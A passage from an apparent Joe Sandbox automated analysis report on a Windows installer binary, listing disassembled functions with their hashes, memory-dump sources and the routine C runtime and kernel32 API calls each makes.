                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: c61d36a671096d47f88a2c87ac744b09336f64855a884e6dd0fc8453e47b1d23
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: 39D1AF71A0424ADFCF01CFE9D988AEEB7B5FF09318F244559E055A3A50EB70D94ACB60
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: c2709ef9f3f9fb8449dcb2e7778dd303fd9ffad487f3c405946c219bc2cb4b7e
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: 0C126C71901209EFDF10DFA9C880AEEBBB5FF4931CF248169E819A7A50E7359985CF50
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D1F7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC3D1FF
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D288
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC3D2B3
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D308
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 964c31bc7aeb05583db0b690e73ad9674ec50b0d29f065cf3bfde52d6526d5c0
                            • Instruction ID: 007a906120d556d086040ad75da707fd1ccc24eed4722632b7b53670f5a23d41
                            • Opcode Fuzzy Hash: 964c31bc7aeb05583db0b690e73ad9674ec50b0d29f065cf3bfde52d6526d5c0
                            • Instruction Fuzzy Hash: A041C634A112289BCF00CF69D840ADE7BB5BF45328F14C155E82C9B751E732DE56CB94
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 79cc3715e047a7332a904a658baaf1fa222caaa413831ea6c6792a67d40ee316
                            • Instruction ID: 62d1ac923823adedc43b87a5f718af3a269717d1723734b35b24c06a5bb208a7
                            • Opcode Fuzzy Hash: 79cc3715e047a7332a904a658baaf1fa222caaa413831ea6c6792a67d40ee316
                            • Instruction Fuzzy Hash: DC21BB71E05621FBDB114A6B8D44E9A37B8AB92768F15C635EC15A7680F630DC01C7E4
                            APIs
                            • GetConsoleCP.KERNEL32(?,6CC4E7C0,?), ref: 6CC4F5E9
                            • __fassign.LIBCMT ref: 6CC4F7C8
                            • __fassign.LIBCMT ref: 6CC4F7E5
                            • WriteFile.KERNEL32(?,6CC591A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4F82D
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC4F86D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4F919
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 499836fdbd8076cce5712ef9c9f412e1155e5c6087774991fe22c313878e742d
                            • Instruction ID: e44be86819968e4a106ee2e6d8ac041ecf368940f8043960fc0b1c2253045c05
                            • Opcode Fuzzy Hash: 499836fdbd8076cce5712ef9c9f412e1155e5c6087774991fe22c313878e742d
                            • Instruction Fuzzy Hash: 12D1AA75E012589FDF15CFA8C8809EDBBB5FF0A314F28856AE855BB341E730A946CB50
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB02F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB02FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB02FD0
                            • __Getctype.LIBCPMT ref: 6CB03084
                            • std::_Facet_Register.LIBCPMT ref: 6CB0309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB030B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID:
                            • API String ID: 1102183713-0
                            • Opcode ID: 1fb60fa32bde6d355e4c0caeb4c72be5e15199b7f3876bf8cb8df6ab565a2ea1
                            • Instruction ID: 64f8c4db67d6f671b099d22c7704d2efad95b9b4364921fbf2c38d207b098da6
                            • Opcode Fuzzy Hash: 1fb60fa32bde6d355e4c0caeb4c72be5e15199b7f3876bf8cb8df6ab565a2ea1
                            • Instruction Fuzzy Hash: 704179B1E00658CFDF10DF84D958B9EBBB4FF45718F054118D819ABB40E774A904CBA1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: 6639595d585b05a5ea1274370638b6a69677bbbaf678cf421e6ea77665d45f09
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: 1F21A530641219FEDF208FA98C44DDF7E69EF417E8F208226B628716E4E2718D51D771
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC7D6F1
                              • Part of subcall function 6CC8C173: __EH_prolog.LIBCMT ref: 6CC8C178
                            • __EH_prolog.LIBCMT ref: 6CC7D8F9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: b61e15951186151bd578caea64ef484842d544ea23cd4273908047dba709b642
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 5D71A130900255DFDB24DFA4C484BEDBBF4FF19308F1084A9D8556BB91EB74AA49CBA1
                            APIs
                            • _free.LIBCMT ref: 6CC591CD
                            • _free.LIBCMT ref: 6CC591F6
                            • SetEndOfFile.KERNEL32(00000000,6CC57DDC,00000000,6CC4E7C0,?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000), ref: 6CC59228
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000,?,?,?,?,00000000,?), ref: 6CC59244
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: 95b0afdcafca3c06923e76d6f5e703ce0a8410abae412603a253c05c6098ede6
                            • Instruction ID: cab272011a43ec4001f4fea4943cb727e736090804592bf1144713584f3b0778
                            • Opcode Fuzzy Hash: 95b0afdcafca3c06923e76d6f5e703ce0a8410abae412603a253c05c6098ede6
                            • Instruction Fuzzy Hash: 8F411CB29006059ADB019BA5CC04BCE3B75EF85334F548684E824E7B90FB30C4774769
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC9141D
                              • Part of subcall function 6CC91E40: __EH_prolog.LIBCMT ref: 6CC91E45
                              • Part of subcall function 6CC918EB: __EH_prolog.LIBCMT ref: 6CC918F0
                              • Part of subcall function 6CC91593: __EH_prolog.LIBCMT ref: 6CC91598
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: f39451af031fb9180ed0492a268511ec3ebb0768e174097d196b6928da86e470
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: 8C219F71D01248AECF04DBE5DA959EDBBB4AF25308F20402DD41237B80EB785E0CCB61
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J$DJ$`J
                            • API String ID: 3519838083-2453737217
                            • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction ID: 83bb3aa312b4b82a2d1876fe3746787747b37e5b08934884c1513b0e480f25e8
                            • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction Fuzzy Hash: E011B0B0900B648EC720DF5AC55419AFBE8AFA5708B10CA1FC4A687B50D7F8A548CB99
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC428A4,00000000,?,6CC42925,6CC3D339,00000003,00000000), ref: 6CC4282F
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC42842
                            • FreeLibrary.KERNEL32(00000000,?,?,6CC428A4,00000000,?,6CC42925,6CC3D339,00000003,00000000), ref: 6CC42865
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: d2498f78d31b3e5da91d082c1869ae733fa5955f623fe7bd0739c62cebc5c463
                            • Instruction ID: 5787e15b81778cfc0191f7271e96de2a1cf7179ae49dde0fff4d4fa778e2209b
                            • Opcode Fuzzy Hash: d2498f78d31b3e5da91d082c1869ae733fa5955f623fe7bd0739c62cebc5c463
                            • Instruction Fuzzy Hash: 28F08231A11118FBDF119B52CE1DF9D7BB8EB4135DF118464A500F2950DF348A41EB90
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6CC3AA1E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CC3AA29
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CC3AA97
                              • Part of subcall function 6CC3A920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC3A938
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6CC3AA44
                            • _Yarn.LIBCPMT ref: 6CC3AA5A
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: d9a41b9448c3eeeaefcd03b1cb891c924a4182b4ceb49e60aae47326ffb847a1
                            • Instruction ID: 18765a2f2d11aa2a79dc41bb460282fb7c3f9dd450834e7e770ba6d6b94c15e8
                            • Opcode Fuzzy Hash: d9a41b9448c3eeeaefcd03b1cb891c924a4182b4ceb49e60aae47326ffb847a1
                            • Instruction Fuzzy Hash: B401BC75B006219FEF06EBA0DA54ABC3BB5FFC6244B151048D90957B80EF38AA56CF91
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 7b6d1953a432ff85bbe01f1c2a0d04f487ead367bb55d2e5e96ba4d6491816ba
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: C5123B74E05249DFCB04CFE8C590ADEBBB1BF49308F148469E486ABB51EB35E945CB60
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: fb5aefaa8199234e641520484358bcc1b29c9c3eb647329c4a10f51a89f81f2a
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 1EB14DB1E022099FDB14CF99C9809AFBBB1FF48318B60856ED416A7B50E774AA45CF50
                            APIs
                              • Part of subcall function 6CC3AA17: __EH_prolog3.LIBCMT ref: 6CC3AA1E
                              • Part of subcall function 6CC3AA17: std::_Lockit::_Lockit.LIBCPMT ref: 6CC3AA29
                              • Part of subcall function 6CC3AA17: std::locale::_Setgloballocale.LIBCPMT ref: 6CC3AA44
                              • Part of subcall function 6CC3AA17: _Yarn.LIBCPMT ref: 6CC3AA5A
                              • Part of subcall function 6CC3AA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC3AA97
                              • Part of subcall function 6CB02F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB02F95
                              • Part of subcall function 6CB02F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB02FAF
                              • Part of subcall function 6CB02F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB02FD0
                              • Part of subcall function 6CB02F60: __Getctype.LIBCPMT ref: 6CB03084
                              • Part of subcall function 6CB02F60: std::_Facet_Register.LIBCPMT ref: 6CB0309C
                              • Part of subcall function 6CB02F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB030B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6CB0211B
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: 72c57a3a3c249f763921173aadb5a3dd5eddf1afe59b2562c06d993769fbebad
                            • Instruction ID: b078dfd936b27c673cec29af2c813aa2f14fb886bd3fa7eb2e0e7d43acda5dea
                            • Opcode Fuzzy Hash: 72c57a3a3c249f763921173aadb5a3dd5eddf1afe59b2562c06d993769fbebad
                            • Instruction Fuzzy Hash: AB41B2B0A003499FDB00CF64D8897AEBBB0FF48314F144268E519AB791E7759989CF91
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $CK$CK
                            • API String ID: 3519838083-2957773085
                            • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction ID: bbe751b5e5e0c91eee5d12046919b8cba7e2cbcdec502ba42a16e710a7e35e16
                            • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction Fuzzy Hash: 4821A171E02615CBCB04DFE9C4801EFFBB2FF95318F14462AC412A3B91E7745A06CAA1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$LrJ$x
                            • API String ID: 3519838083-658305261
                            • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction ID: c1c57b1b43158a4e8fb4a6cfb7c45a6354e4f80274aa1265664147a66b4146a0
                            • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction Fuzzy Hash: D0218132D01119DBCF04DBD8CAD4AEDB7B5EF98348F20005AD41177A40EB759E09CBA5
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC97ECC
                              • Part of subcall function 6CC8258A: __EH_prolog.LIBCMT ref: 6CC8258F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: a6851eba17a9dfcf479f0303ef46d15221c081a3bed0e32c46a3e6744f1d11c9
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: DA21C6B0801B40CFC760CF6AC14428ABBF4FF29708B10895EC0AA97F11E7B8A609CF55
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC4E7C0,6CB01DEA,00008000,6CC4E7C0,?,?,?,6CC4E36F,6CC4E7C0,?,00000000,6CB01DEA), ref: 6CC4E4B9
                            • GetLastError.KERNEL32(?,?,?,6CC4E36F,6CC4E7C0,?,00000000,6CB01DEA,?,6CC57D8E,6CC4E7C0,000000FF,000000FF,00000002,00008000,6CC4E7C0), ref: 6CC4E4C3
                            • __dosmaperr.LIBCMT ref: 6CC4E4CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: e7583522c6b9a1174f2957c684c7bd019576d9283619ae17b977aec67f370ed9
                            • Instruction ID: 2448a2b1620e159854bc7cee72b407b8235e5114031c467d136f7e212e5b6f2a
